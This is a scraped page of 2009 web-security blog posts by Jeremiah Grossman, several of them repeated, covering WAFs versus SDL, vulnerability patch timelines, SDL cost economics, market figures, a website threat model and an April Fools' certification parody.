I read a tremendous amount of online material, much of which originates from 200+ RSS feeds. Sure the well-known blogs continue to generate great timely content, but there are a few diamonds in the rough that don't get a lot of attention. They instead focus on quality rather than quantity in their postings offering a deep infosec business and technical analysis on subjects not well covered elsewhere. Figured I should share of a few of my favorites.
Boaz Gelbord
With a business rather than technical tone, Boaz discusses how organizations act and react to certain events in the industry such as compliance, regulations and law. Management, spending, and incentives are routinely explored that influence organizational behavior.
ZScaler Research - Michael Sutton, Jeff Forristal, etc.
Heavy on the technical details and very timely in regards to Web security related issues. Cross-Site Scripting, Browser Security, Worms, etc etc. What more did you want!?
Tactical Web Application Security - Ryan Barnett
A technical and operational point of view on Web security matters with great attack analysis.
HolisticInfoSec.org - Russ McRee
The best way I can describe Russ is he keeps the infosec industry honest, and that includes vendors AND website owners. While exceptionally fair minded, he's not at all shy to call BS when he sees it.
The Spanner - Gareth Heyes
Deeply technical, browser vendors beware of Gareth Heyes the master of HTML/JS code obfuscation. Ecodings, strange "features", and XSS are just some of the topics covered in stelar detail.
Venture capitalist (Grossman Ventures https://grossman.vc), Internet protector and industry creator. Founded WhiteHat Security & Bit Discovery. BJJ Black Belt.
Wednesday, May 13, 2009
Friday, May 08, 2009
WAFs and anti-SDL assumptions
When someone advocates Web Application Firewalls (WAF), some people mistakenly assume they also must be anti-Security Development Lifecycle (SDL). For myself and WhiteHat Security, nothing could be further from the truth. While WhiteHat advocates the use of WAFs, at the same time what most people do no realize is we also develop a significant amount of mission critical Web code in-house. Our SDL is incredibly important to us because just like many of you we also have a development team responsible for building website(s). Websites responsible for safeguarding and maintaining access control over extremely sensitive data, our customers data. That website would be WhiteHat Sentinel.
WhiteHat Sentinel, for all its mass-scale vulnerability scanning capabilities we are well-known for, it is also a sophisticated multi-user Web-based portal that manages website vulnerability data. Yes, we use WAFs, but don’t assume for a moment this means we are pushing insecure code and thinking it will keep everything safe. No way! The fact is our systems are attacked constantly by robots, competitors, customers, third-party vendors, and everyone else you can imagine. We commonly receive free (unauthorized) scans by products such as AppScan and WebInspect, which is somehow ironic. We also routinely attack ourselves where Sentinel scans Sentinel. Through it all our system MUST continue humming along securely 24x7x365. That can’t happen without a commitment to software security.
After nearly a decade we are used to this type of environment. It is part of being in the industry and this visibility is one thing that keeps us on the ball. We know that if we let down our guard, if only for a moment, bad things will surely happen like so many other security vendors who have been named in unfortunate headlines. In my opinion complacency is the enemy of security ever so much more so than complexity. While I can’t describe all the processes we do to protect the data, I can say it is significant. I’ll see what I can do about dedicating some future posts about our internal development processes. Who knows, some people might be interested. In the mean time one could assume we are loaded up with network, host, and yes even software security products and processes.
WhiteHat Sentinel, for all its mass-scale vulnerability scanning capabilities we are well-known for, it is also a sophisticated multi-user Web-based portal that manages website vulnerability data. Yes, we use WAFs, but don’t assume for a moment this means we are pushing insecure code and thinking it will keep everything safe. No way! The fact is our systems are attacked constantly by robots, competitors, customers, third-party vendors, and everyone else you can imagine. We commonly receive free (unauthorized) scans by products such as AppScan and WebInspect, which is somehow ironic. We also routinely attack ourselves where Sentinel scans Sentinel. Through it all our system MUST continue humming along securely 24x7x365. That can’t happen without a commitment to software security.
After nearly a decade we are used to this type of environment. It is part of being in the industry and this visibility is one thing that keeps us on the ball. We know that if we let down our guard, if only for a moment, bad things will surely happen like so many other security vendors who have been named in unfortunate headlines. In my opinion complacency is the enemy of security ever so much more so than complexity. While I can’t describe all the processes we do to protect the data, I can say it is significant. I’ll see what I can do about dedicating some future posts about our internal development processes. Who knows, some people might be interested. In the mean time one could assume we are loaded up with network, host, and yes even software security products and processes.
Real-World website vulnerability disclosure & patch timeline
Protecting large trafficked and high valued websites can be an interesting InfoSec job to say the least. One thing you quickly learn is that you are under constant attack by essentially everyone with every technique they got and all the time. Noisy robots (worms & viruses) and fully targeted attackers are just par for the course. Sometimes attackers are independent researchers testing their metal or the third-party security firm hired to report what all the aforementioned attackers already know (or likely to know) about your current security posture.
When new Web code is pushed to production its a really good idea to have a vulnerability assessment scheduled immediately after to ensure security, separate from an SDL defect reducing processes. PCI-DSS requires this of merchants. At this point it becomes a “find and fix” race between the good guys and the bad guys to identify any previously unknown issues. Below is a real-world website vulnerability disclosure and patch timeline from a WhiteHat Sentinel customer who takes security, well, very seriously. The website in question is rather large and sophisticated.
* Specific dates and times have been replaced with elapsed time (DD::HH::MM) to protect identity of those involved. Some exact dates/time were not able to be confirmed.
??::??::?? - New Web code is pushed to a production website
00:00:00 - WhiteHat Sentinel scheduled scan initiates
02:19:45 - Independent researcher notifies website owner of a website vulnerability
02:20:19 - WhiteHat Sentinel independently identifies (identical) potential vulnerability
* WhiteHat Sentinel scan total time elapsed: 00:26:19 (blackout windows)
02:21:24 - Independent researchers publicly discloses vulnerability details
02:23:18 - WhiteHat Operations verifies Sentinel discovered vulnerability (customer notification sent)
02:23:45 - Website owner receives the notifications and begins resolution processes
03:00:00 - WhiteHat Operations notifies customer of public disclosure
??::??::?? - Web code security update is pushed to production website
03:09:06 - WhiteHat Sentinel confirms issue resolved
Notice the independent researcher reported the exact same issue we found, but less than an hour before we found it! They could have very easily not have though (disclosed). Also note the customers speed of fix, under 12 clock hours, which is stellar considering most are in the weeks or months. As you can see the bad guys are scanning/testing just has hard fast and continuous as we are, which is a little scary to think about.
When new Web code is pushed to production its a really good idea to have a vulnerability assessment scheduled immediately after to ensure security, separate from an SDL defect reducing processes. PCI-DSS requires this of merchants. At this point it becomes a “find and fix” race between the good guys and the bad guys to identify any previously unknown issues. Below is a real-world website vulnerability disclosure and patch timeline from a WhiteHat Sentinel customer who takes security, well, very seriously. The website in question is rather large and sophisticated.
* Specific dates and times have been replaced with elapsed time (DD::HH::MM) to protect identity of those involved. Some exact dates/time were not able to be confirmed.
??::??::?? - New Web code is pushed to a production website
00:00:00 - WhiteHat Sentinel scheduled scan initiates
02:19:45 - Independent researcher notifies website owner of a website vulnerability
02:20:19 - WhiteHat Sentinel independently identifies (identical) potential vulnerability
* WhiteHat Sentinel scan total time elapsed: 00:26:19 (blackout windows)
02:21:24 - Independent researchers publicly discloses vulnerability details
02:23:18 - WhiteHat Operations verifies Sentinel discovered vulnerability (customer notification sent)
02:23:45 - Website owner receives the notifications and begins resolution processes
03:00:00 - WhiteHat Operations notifies customer of public disclosure
??::??::?? - Web code security update is pushed to production website
03:09:06 - WhiteHat Sentinel confirms issue resolved
Notice the independent researcher reported the exact same issue we found, but less than an hour before we found it! They could have very easily not have though (disclosed). Also note the customers speed of fix, under 12 clock hours, which is stellar considering most are in the weeks or months. As you can see the bad guys are scanning/testing just has hard fast and continuous as we are, which is a little scary to think about.
Saturday, May 02, 2009
8 reasons why website vulnerabilities are not fixed
Some reasons I've heard over the years. In no particular order...
- No one at the organization understands or is responsible for maintaining the code.
- Features are prioritized ahead of security fixes.
- Affected code is owned by an unresponsive third-party vendor.
- Website will be decommissioned replaced "soon".
- Risk of exploitation is accepted.
- Solution conflicts with business use case.
- Compliance does not require it.
- No one at the organization knows about, understands, or respects the issue.
Friday, May 01, 2009
Mythbusting, Secure code is less expensive to develop
Conventional wisdom says developing secure software from the beginning is less expensive in the long run. Commonly cited as evidence is an IEEE article “Software Defect Reduction Top 10 List” (published Jan 2001) states, “Finding and fixing a software problem after delivery is often 100 times more expensive than finding and fixing it during the requirements and design phase.” Many security practitioners borrowed this metric (and others similar) in effort justify a security development life-cycle (SDL) investment because software vulnerabilities can be viewed as nothing more than defects (problems). The reason being is its much easier to demonstrate a hard return-on-investment by saying, “If we spend $X dollars implementing an SDL we will save $Y dollars.” This as opposed to attempting to quantify a nebulous risk value by estimating, " If we spend $X on implementing an SDL, we’ll reduce of risk of loss of $Y by B%.”
The elephant in the room is vulnerabilities are NOT the same as functional problems and the quote from the aforementioned article references research from 1987. That’s pre-World Wide Web! Data predating C#, Java, Ruby, PHP, and even Perl -- certainly reason enough to question its applicability in today’s landscape. For now though lets focus on what a vulnerability is and isn’t. A vulnerability is a piece of unintended functionality enabling an attacker to penetrate a system. An attacker might exploit a vulnerability to access confidential information, obtain elevated account privileges, and so on. A single instance represents an ongoing business risk, not guaranteed to occur, until remediated and may be acceptable according to an organizations tolerance for that risk. Said simply, a vulnerability does not necessarily have to be fixed for an application to continue functioning as expected. This is very different from a functional problem (or bug if you prefer) actively preventing an application from delivering service and/or generating revenue that does (have to be fixed - Thank you Joel!).
Functional defects often number in the hundreds, even thousands or more depending on the code base, easily claiming substantial portions of maintenance budgets. Reducing the costs associated with functional defects is a major reason why so much energy is spent evolving the art of software development into a true engineering science. It would be fantastic to eliminate security problems using the same money saving logic before they materialize. To that end best-practice activities such as threat modeling, architectural design reviews, developer training, source code audits, scanning during QA, and more are recommended. The BSIMM, a survey of nine leading software security initiatives, accounted for 110 such different activities. Frequently these activities require fundamental changes to the way software is built and business conducted. Investments starting at six to seven figures are not abnormal, so SDL implementation should not be taken lightly and must be justified accordingly. Therefore, how much of what could we have eliminated upfront at what cost is the question we need to answer.
Our work at WhiteHat Security reveals websites today average about seven serious and remotely exploitable vulnerabilities leaving the door open to compromise of sensitive information, financial loss, brand damage, violation of industry regulation, and downtime. For those unfamiliar with the methods commonly employed to break into a websites they are not buffer overflows, format string issues, and unsigned integers. Those techniques are most often applied to commercial and open source software. Custom Web applications are instead exploited via SQL Injection, Cross-Site Scripting (XSS), and various forms of business logic flaws -- the very same issues prevalent in our Top Ten list and not so coincidentally a leading cause of data loss according to Verizon’s 2009 Data Breach Investigations Report. External attackers, linked to organized crime, exploiting web-based flaws.
To estimate cost-to-fix I queried 1,100+ Twitter (@jeremiahg) followers (and other personal contacts) for how many man-hours (not clock time) it normally requires to fix (code, test, and deploy) a standard XSS or SQL Injection vulnerability. Answers ranged from 2 to 80 hours, so I selected 40 as a conservative value paired with a $100 per hour in hard development costs. Calculated:
40 man-hours x $100 hour
= $4,000 in labor costs to fix a single vulnerability
$4,000 x 7 (average # of vulnerabilities per website)
= $28,000 in outstanding insecure software debt
To be fair there are outlier websites so insecure, such as those having no enforced notion of authorization, that the entire system must be rebuilt from scratch. Still we should not automatically assume supporting Web-based software is the same as traditional desktop software as the differences are vast. Interestingly even if the aforementioned 100x-less-expensive-to-fix-during-the-design-phase metric still holds true, the calculated estimates above do not seem to be a cause for serious concern. Surely implementing a regimented SDL is orders of magnitude more expensive to prevent vulnerabilities before they happen than the $28,000 required to fix them after the fact. When you look at the numbers in those terms a fast paced and unencumbered development model of release-early-release-often sounds more economical. Only it isn’t. It really isn’t. Not due to raw development costs mind you, but because the risks of compromise are at an all-time high.
Essentially every recent computer security report directly links the rise in cybercrime, malware propagation, and data loss to Web-based attacks. According to Websense, "70 percent of the top 100 most popular Web sites either hosted malicious content or contained a masked redirect to lure unsuspecting victims from legitimate sites to malicious sites." The Web Hacking Incident Database has hundreds more specific examples and when a mission critical website is compromised it is basically guaranteed to surpass $28,000 in hard and soft costs. The potential for down time, financial fraud, loss of visitor traffic and sales when search engines blacklist the site, recovery efforts, increased support call volume, FTC and payment card industry fines, headlines tarnishing trust in the brand, and so on are typical. Of course this assumes the organization survives at all, which has not always been the case. Pay now or pay later, this is where the meaningful costs are located. Reducing the risk of such an event and minimizing the effects when it does is a worthwhile investment. How much to spend is comparable to each organizations tolerance for risk and the security professionals ability to convey it accurately to the stakeholders. At the end of the day having a defensible position of security due care is essential. This is a big reason why implementing an SDL can be less expensive than not.
The elephant in the room is vulnerabilities are NOT the same as functional problems and the quote from the aforementioned article references research from 1987. That’s pre-World Wide Web! Data predating C#, Java, Ruby, PHP, and even Perl -- certainly reason enough to question its applicability in today’s landscape. For now though lets focus on what a vulnerability is and isn’t. A vulnerability is a piece of unintended functionality enabling an attacker to penetrate a system. An attacker might exploit a vulnerability to access confidential information, obtain elevated account privileges, and so on. A single instance represents an ongoing business risk, not guaranteed to occur, until remediated and may be acceptable according to an organizations tolerance for that risk. Said simply, a vulnerability does not necessarily have to be fixed for an application to continue functioning as expected. This is very different from a functional problem (or bug if you prefer) actively preventing an application from delivering service and/or generating revenue that does (have to be fixed - Thank you Joel!).
Functional defects often number in the hundreds, even thousands or more depending on the code base, easily claiming substantial portions of maintenance budgets. Reducing the costs associated with functional defects is a major reason why so much energy is spent evolving the art of software development into a true engineering science. It would be fantastic to eliminate security problems using the same money saving logic before they materialize. To that end best-practice activities such as threat modeling, architectural design reviews, developer training, source code audits, scanning during QA, and more are recommended. The BSIMM, a survey of nine leading software security initiatives, accounted for 110 such different activities. Frequently these activities require fundamental changes to the way software is built and business conducted. Investments starting at six to seven figures are not abnormal, so SDL implementation should not be taken lightly and must be justified accordingly. Therefore, how much of what could we have eliminated upfront at what cost is the question we need to answer.
Our work at WhiteHat Security reveals websites today average about seven serious and remotely exploitable vulnerabilities leaving the door open to compromise of sensitive information, financial loss, brand damage, violation of industry regulation, and downtime. For those unfamiliar with the methods commonly employed to break into a websites they are not buffer overflows, format string issues, and unsigned integers. Those techniques are most often applied to commercial and open source software. Custom Web applications are instead exploited via SQL Injection, Cross-Site Scripting (XSS), and various forms of business logic flaws -- the very same issues prevalent in our Top Ten list and not so coincidentally a leading cause of data loss according to Verizon’s 2009 Data Breach Investigations Report. External attackers, linked to organized crime, exploiting web-based flaws.
To estimate cost-to-fix I queried 1,100+ Twitter (@jeremiahg) followers (and other personal contacts) for how many man-hours (not clock time) it normally requires to fix (code, test, and deploy) a standard XSS or SQL Injection vulnerability. Answers ranged from 2 to 80 hours, so I selected 40 as a conservative value paired with a $100 per hour in hard development costs. Calculated:
40 man-hours x $100 hour
= $4,000 in labor costs to fix a single vulnerability
$4,000 x 7 (average # of vulnerabilities per website)
= $28,000 in outstanding insecure software debt
To be fair there are outlier websites so insecure, such as those having no enforced notion of authorization, that the entire system must be rebuilt from scratch. Still we should not automatically assume supporting Web-based software is the same as traditional desktop software as the differences are vast. Interestingly even if the aforementioned 100x-less-expensive-to-fix-during-the-design-phase metric still holds true, the calculated estimates above do not seem to be a cause for serious concern. Surely implementing a regimented SDL is orders of magnitude more expensive to prevent vulnerabilities before they happen than the $28,000 required to fix them after the fact. When you look at the numbers in those terms a fast paced and unencumbered development model of release-early-release-often sounds more economical. Only it isn’t. It really isn’t. Not due to raw development costs mind you, but because the risks of compromise are at an all-time high.
Essentially every recent computer security report directly links the rise in cybercrime, malware propagation, and data loss to Web-based attacks. According to Websense, "70 percent of the top 100 most popular Web sites either hosted malicious content or contained a masked redirect to lure unsuspecting victims from legitimate sites to malicious sites." The Web Hacking Incident Database has hundreds more specific examples and when a mission critical website is compromised it is basically guaranteed to surpass $28,000 in hard and soft costs. The potential for down time, financial fraud, loss of visitor traffic and sales when search engines blacklist the site, recovery efforts, increased support call volume, FTC and payment card industry fines, headlines tarnishing trust in the brand, and so on are typical. Of course this assumes the organization survives at all, which has not always been the case. Pay now or pay later, this is where the meaningful costs are located. Reducing the risk of such an event and minimizing the effects when it does is a worthwhile investment. How much to spend is comparable to each organizations tolerance for risk and the security professionals ability to convey it accurately to the stakeholders. At the end of the day having a defensible position of security due care is essential. This is a big reason why implementing an SDL can be less expensive than not.
Friday, April 17, 2009
Software Security grew to nearly 500M in 2008
Separate from an economy in recession I’m excited to be a part of market with a healthy, if not impressive, growth clip. Gary McGraw (Cigital) published his Software Security annual revenue numbers for 2008. By combining software security tools, Software-as-a-Service providers, and professional services it comes really close to a half billion dollars. This means a lot to us vendors, their investors, and would be acquires -- for average enterprise, feel free to ignore. Instead focus on the particular solutions you need rather than basing vendor selection on prevailing winds. To do otherwise is similar to buying a house locally based upon national real estate averages.
2008 showed scanning tool (black and white box) sales as continuing to climb, but the heavily fragmented pen-testing side are those who are pulling in the lions share of the cash. This is to be expected if I was right about the general market migration mirroring that of network security. Time will tell. However, there was some analysis where I had to take issue with some of Gary’s conclusions, to which I’m hopeful he’ll set me straight.
"In 2007, the white box code review companies’ combined revenue eclipsed the black box Web app testing tool vendors’ combined revenue. As Figure 2 above shows, this trend continues in 2008. I think this is a very healthy development, demonstrating that the market is becoming ever more interested in solving software security issues and not simply diagnosing them."
Not so fast! Is that really fair to assume? By the same logic could we also conclude that McDonalds offers better meat than Morton’s (a popular steakhouse) because of the volume sold. Or, is that equally unfair? Here's another bit that doesn't feel right and deserves context...
"I am aware of 35 large-scale software security initiatives currently underway."
Certainly there are more than 35 deployed Web Application Firewalls in the world (or even in the U.S), but we wouldn’t automatically conclude that organizations are happier to band-aid the software (in)-security problem than fix it at the source.
When it’s all said and done, I like numbers. Publish what we have, good or bad, analyze them and improve overtime.
2008 showed scanning tool (black and white box) sales as continuing to climb, but the heavily fragmented pen-testing side are those who are pulling in the lions share of the cash. This is to be expected if I was right about the general market migration mirroring that of network security. Time will tell. However, there was some analysis where I had to take issue with some of Gary’s conclusions, to which I’m hopeful he’ll set me straight.
"In 2007, the white box code review companies’ combined revenue eclipsed the black box Web app testing tool vendors’ combined revenue. As Figure 2 above shows, this trend continues in 2008. I think this is a very healthy development, demonstrating that the market is becoming ever more interested in solving software security issues and not simply diagnosing them."
Not so fast! Is that really fair to assume? By the same logic could we also conclude that McDonalds offers better meat than Morton’s (a popular steakhouse) because of the volume sold. Or, is that equally unfair? Here's another bit that doesn't feel right and deserves context...
"I am aware of 35 large-scale software security initiatives currently underway."
Certainly there are more than 35 deployed Web Application Firewalls in the world (or even in the U.S), but we wouldn’t automatically conclude that organizations are happier to band-aid the software (in)-security problem than fix it at the source.
When it’s all said and done, I like numbers. Publish what we have, good or bad, analyze them and improve overtime.
Website threats and their capabilities
Vulnerabilities don’t exploit themselves. Someone or something (“threat”) uses an attack vector ( to exploit a vulnerability in an asset, bypassing a control, and causes a technical or business impact. A diagram found in OWASP Catalyst (pg. 28) illustrates the concept exceptionally well. This is important to keep in mind because not every threat exercises the same technical capability or end-goal. Some threats are sentient, others are autonomous, and their methods are different as is their target selection. While I’ve seen many published threat models, I’ve not seen any specifically focused on the nuances of website security (maybe I missed it?). Website security is much different from other forms of software or business models and deserves special attention in the ways it's handled.

After studying Verizon’s 2009 Data Breach Investigations Report, you learn a few things about what or who we’re up against. Most threats are external, use SQL Injection en-masse, and linked to organized crime. This means they don’t typically have access to the source code or binaries of the custom Web applications they exploit (not that they need it). This threat profile is different from someone analyzing a piece of operation system software to uncover a 0-day who may test locally 24x7 without raising alarms. Also different from scanning a network for an unpatched issues open to a ready made exploit. Verizon goes further to organize the apparent threats into three types based upon how they chose their targets:
Random opportunistic: Victim randomly selected
Directed opportunistic: Victim selected, but only because they were known to have a particular exploitable weakness
Fully targeted: Victim was chosen and then attack planned
To make these a bit more website security specific I took the liberty of crafting some quick descriptions and associated activities a threat might perform as part of their attack vectors as a way of getting things started.
Random opportunistic: Attacks are completely automated, noisy, unauthenticated, exploit well-known unpatched issues and some customized Web application vulnerabilities. Targets are chosen indiscriminately through wide scans and tend to impact the most vulnerable. Typical motivation is to infect Web pages with malware or subtle defacement.
Example: With Mass SQL Injection automated worms insert malicious JavaScript IFRAMEs (pointing to malware servers) into back-end databases and used the capability to exploit unpatched Web browsers.
Directed opportunistic: Attacker with professional or open source scanning tools. May register accounts, authenticate, and customize exploits for custom Web application flaws found easily by automation. Targets are those with valuable data that can be monetized, a tarnishable brand, and penetrable within a few days of effort.
Example: XSS vulnerabilities used to create very convincing Phishing scams that appear on the real-website as opposed to a fake. JavaScript malware steals victims session cookies and passwords.
Fully targeted: Highly motivated attacker with professional, open source, and purpose built scanning tools. May register accounts, authenticate, customize exploits for custom Web application vulnerabilities, and capitalize on business logic flaws. Victims may be defrauded, extorted, and targeted from anywhere to a year or more.
Example: ‘The Analyzer’, allegedly hacked into a multiple financial institutions using SQL Injection to steal credit and debit card numbers that were then used by thieves in several countries to withdraw more than $1 million from ATMs.
By aligning a threats capabilities against a particular security control it becomes much easier to predict and/or justify that controls effectiveness. The same is true for vulnerability assessment results, which SHOULD give some type of assurance or measure of the risk posed by a particular threat. Just randomly choosing a set of vulnerabilities to scan for doesn't exactly give you that.

After studying Verizon’s 2009 Data Breach Investigations Report, you learn a few things about what or who we’re up against. Most threats are external, use SQL Injection en-masse, and linked to organized crime. This means they don’t typically have access to the source code or binaries of the custom Web applications they exploit (not that they need it). This threat profile is different from someone analyzing a piece of operation system software to uncover a 0-day who may test locally 24x7 without raising alarms. Also different from scanning a network for an unpatched issues open to a ready made exploit. Verizon goes further to organize the apparent threats into three types based upon how they chose their targets:
Random opportunistic: Victim randomly selected
Directed opportunistic: Victim selected, but only because they were known to have a particular exploitable weakness
Fully targeted: Victim was chosen and then attack planned
To make these a bit more website security specific I took the liberty of crafting some quick descriptions and associated activities a threat might perform as part of their attack vectors as a way of getting things started.

Random opportunistic: Attacks are completely automated, noisy, unauthenticated, exploit well-known unpatched issues and some customized Web application vulnerabilities. Targets are chosen indiscriminately through wide scans and tend to impact the most vulnerable. Typical motivation is to infect Web pages with malware or subtle defacement.
Example: With Mass SQL Injection automated worms insert malicious JavaScript IFRAMEs (pointing to malware servers) into back-end databases and used the capability to exploit unpatched Web browsers.
Directed opportunistic: Attacker with professional or open source scanning tools. May register accounts, authenticate, and customize exploits for custom Web application flaws found easily by automation. Targets are those with valuable data that can be monetized, a tarnishable brand, and penetrable within a few days of effort.
Example: XSS vulnerabilities used to create very convincing Phishing scams that appear on the real-website as opposed to a fake. JavaScript malware steals victims session cookies and passwords.
Fully targeted: Highly motivated attacker with professional, open source, and purpose built scanning tools. May register accounts, authenticate, customize exploits for custom Web application vulnerabilities, and capitalize on business logic flaws. Victims may be defrauded, extorted, and targeted from anywhere to a year or more.
Example: ‘The Analyzer’, allegedly hacked into a multiple financial institutions using SQL Injection to steal credit and debit card numbers that were then used by thieves in several countries to withdraw more than $1 million from ATMs.
By aligning a threats capabilities against a particular security control it becomes much easier to predict and/or justify that controls effectiveness. The same is true for vulnerability assessment results, which SHOULD give some type of assurance or measure of the risk posed by a particular threat. Just randomly choosing a set of vulnerabilities to scan for doesn't exactly give you that.
Thursday, April 02, 2009
Disagree with the Concept or Implementation?
Web Application Firewalls, Professional Certifications, Website Trust Logos, and Compliance Regulations are contentious topics that spark spirited debates by those for and against their existence. For years I’ve studied thoughtful arguments voiced by many people about why they disagree with these things (solutions?) often with logic that is hard to discount. What’s interesting is the vast majority of the time it’s only the current implementation by particular security vendors that are opposed. We all know many vendors abuse customers with over promising marketing, under delivering products, selling/doing/saying anything for a buck, etc. This reality will never go away, we can only expose the behavior, and this is also very different from saying that the concept behind the solutions shouldn’t exist at all or be offered by someone capable of doing better.
For example, three years ago like basically everyone in the webappsec at the time, I was a staunch WAF opponent. The WAF concept made no sense to me because why would anyone go through the pain of implementing such a device when they could simply fix the code and be done forever? That is until one day while compiling Sentinel vulnerability statistics and the volumes being identified revealed a problem so massive, pent up by over a decade of egregiously insecure Web code, that it obviously could not be solved with available fix-the-code resources (time/cost/skill) anytime soon. IT Security personnel also shared their pain of having no authority over development groups, no juice with the business to fix vulnerabilities over adding new features, and limited options to protect websites in which they were responsible for. Malicious exploitation seemed to be the only thing that genuinely stimulated action.
IT Security clearly needed an operational solution. The only answer to the aforementioned problem was the promise of a WAF. Whether not they functioned as advertised became immaterial, the bottom-line was we needed WAFs to work! Seriously, it's insane to think its possible to mitigate millions of vulnerabilities across millions of websites, even if you could find them (the vulns or the sites). Seeing the writing on the wall I invested myself in WAF technology changing my conceptual opinion to implementation and set out to see what WhiteHat could contribute. That eventually led to the (VA+WAF) solution where vulnerabilities found through our assessment process could be imported as customized rules into a WAF. This provides a viable option to mitigate now, and remediate the source of the problem in the time and manner that made business sense ... to them.
As always I’m curious to know what other think and how they characterize their opinions according the following solutions. If you disagree with them, is it on the basis of Concept or Implementation (and why)?
Web Application Firewalls - ?
Professional Certifications - ?
Website Trust Logos - ?
Compliance Regulations - ?
For example, three years ago like basically everyone in the webappsec at the time, I was a staunch WAF opponent. The WAF concept made no sense to me because why would anyone go through the pain of implementing such a device when they could simply fix the code and be done forever? That is until one day while compiling Sentinel vulnerability statistics and the volumes being identified revealed a problem so massive, pent up by over a decade of egregiously insecure Web code, that it obviously could not be solved with available fix-the-code resources (time/cost/skill) anytime soon. IT Security personnel also shared their pain of having no authority over development groups, no juice with the business to fix vulnerabilities over adding new features, and limited options to protect websites in which they were responsible for. Malicious exploitation seemed to be the only thing that genuinely stimulated action.
IT Security clearly needed an operational solution. The only answer to the aforementioned problem was the promise of a WAF. Whether not they functioned as advertised became immaterial, the bottom-line was we needed WAFs to work! Seriously, it's insane to think its possible to mitigate millions of vulnerabilities across millions of websites, even if you could find them (the vulns or the sites). Seeing the writing on the wall I invested myself in WAF technology changing my conceptual opinion to implementation and set out to see what WhiteHat could contribute. That eventually led to the (VA+WAF) solution where vulnerabilities found through our assessment process could be imported as customized rules into a WAF. This provides a viable option to mitigate now, and remediate the source of the problem in the time and manner that made business sense ... to them.
As always I’m curious to know what other think and how they characterize their opinions according the following solutions. If you disagree with them, is it on the basis of Concept or Implementation (and why)?
Web Application Firewalls - ?
Professional Certifications - ?
Website Trust Logos - ?
Compliance Regulations - ?
Wednesday, April 01, 2009
New cert program for Application Security Specialists

Love them or hate them, certifications are a part of the information security industry. As waves of new comers flood into the emerging application security field, overwhelming hiring managers, it's imperative that true "specialists" distinguish themselves from the general InfoSec practitioner. Obtaining a respected certification is one way for a professional to do exactly that while simultaneously increasing their credibility. Still the challenge for many is a lack of time to study, attend classes, take exams, and the high costs involved -- not to mention healthy skepticism of the value provided by such programs. What we do know is the more exclusive and specialized a certification is, the more value it may hold. So that's when I heard about the The Institute for Certified Application Security Specialists (ASS) offering a program, I had to investigate.
After visiting their site and reading the literature, I must say I was thoroughly impressed. I was previously aware of the CSSLP program, but their process was a little too involved. Conversely the Institute created a streamlined program to meet the requirements of both organizations and individuals in today's fast evolving application security landscape. The ASS certification takes into account previous work experience, industry standards and best-practices, includes a sound Code of Ethics, and even a well thought out Oath of Office. That way certification holders can rest assured they'd be in good company. Should an applicant qualify for an official certification they can obtained one without examination in minutes with a 3-step process (see right-side column) at a cost anyone can easily afford. After successful completion a person may proudly proclaim they are a Certified ASS!
I'm confident this offering will become very popular after experiencing the process personally. Lastly, one must be aware though that according to the terms certifications are only valid up until the release of Web 3.0 where additional standards may apply.
Thursday, March 26, 2009
Website security needs a strategy

The Web security industry supposedly advocates a strategy based upon risk reduction, but predominately practices defect reduction as the measuring stick. This is NOT the same and provides no assurance that a website is more secure against an attack of certain capability. Then in the next breath, as Pete Lindstrom points out, we ironically consider those with the most identified/patched vulnerabilities as the least secure. Simultaneously the community engages in endless ideological debates about black box testing versus source code reviews, the value of SDL pitted against Web Application Firewalls, certification as opposed to field experience, and vast collections of “best-practices” suggested as appropriate for everyone in every case. Confusion and frustration is a reader’s takeaway. It must be understood that each component can be seen as a piece of the puzzle, if only done so without losing sight of the bigger picture -- which is...
How to conduct e-commerce securely and remain consistent with business goals
To be successful companies need a plan -- a common sense approach to building an enterprise risk-based strategy. A system enabling solutions to be implemented in the time and place that maximizes return, demonstrates success, and by extension justifies the investment to the business in the language they understand. A strategy that perhaps begins by addressing the most common question, “Where do I start?” One simple answer is to locate, value, and prioritize an organization’s websites. Go further by assisting the business units in understanding the relevant issues such as “What do we really need to be concerned about first?” Describe the most likely threats (attackers), their capabilities, motives and which vulnerability classes are most likely to be targeted. Only when you know what you own, how much it’s worth, and what attack types must be defended against, according to business objectives, can security be applied in a risk-based fashion.
The problem CIOs and CSOs are facing is that the pseudo Web security standards available are completely inadequate for accomplishing the task. I am not the first to have called out this need. This is what Arian Evans has been talking at length about. As have Rafal Los, Ryan Barnett, Boaz Gelbord, Michael Dahn, Rich Mogull / Adrian Lane, Wade Woolwine, Nick Coblenz, Richard Bejtlich, Gunnar Peterson and likely many others. Many of the building blocks necessary for building a standard are scattered around the Internet including secure software programs, testing guides, and top X lists. These tactical documents could potentially be leveraged into a higher-level framework and serve as the basis for a mature risk-based enterprise website security strategy. The OCTAVE Method, FAIR, ISO 27001/2, among others, also contain well thought out and accepted concepts which we could use as a model.
It is imperative now more than ever that such a resource exists to satisfy a clearly unfulfilled need. CIOs and CSOs know there is a Web security problem. Now they seek guidance in how to develop a program that is flexible enough to meet their individual needs, which can also demonstrate success in manageable increments. I’ve been in contact with several industry thought leaders and enterprise security managers who have expressed personal interest, even excitement, in building out such a system. It is time to start helping ourselves answer the question, “Who is winning the game?”
I feel very strongly about the importance of this effort and I'll be dedicating personal time to see the idea go forward. To move ahead quickly, the Web Application Security Consortium (WASC) and The SANS Institute are planning to initiating a joint open community project (to be named later). If you would like to get involved, please stay tuned for more details.
Thursday, March 19, 2009
Quick Wins and Web Application Security
Lately I’ve been asking peers why they think comparably few dollars are spent addressing Web application security (by percentage to host/network), which every industry report states represents the largest information security risk. Is the reason that organizations don’t “get it”? Are available solutions ineffective? Do compliance failures need more teeth? Does the market need more time to mature? The answer is crucial, because without funds there is no way to secure the vast majority of insecure websites and we all suffer as a result. A combination of factors is probably a fair estimation, but the more I dig in the more I’m convinced something more powerful and yet mundane hides just beneath the surface. A recent conversation with Joseph Feiman (Gartner) revealed a profound insight. To paraphrase:
During an event a panel of Gartner Analysts asked the audience what the best way is for organization to invest $1 million dollars in effort to reduce risk. The choices were Network, Host, or Application security to which the Gartner analysts made their cases for these three disciplines. The catch was the budget could not be shared between them and must be prioritized into a single initiative. The audience selected Application security. However, the Gartner CSO (who took the role of CIO in the play) overruled the audiences' decision. They instead selected Network security, while at the same time curiously agreeing that Application security would have been the better path. His rational was that that it is easier for him to show results to his CEO if he invests in the Network.
Think about that!
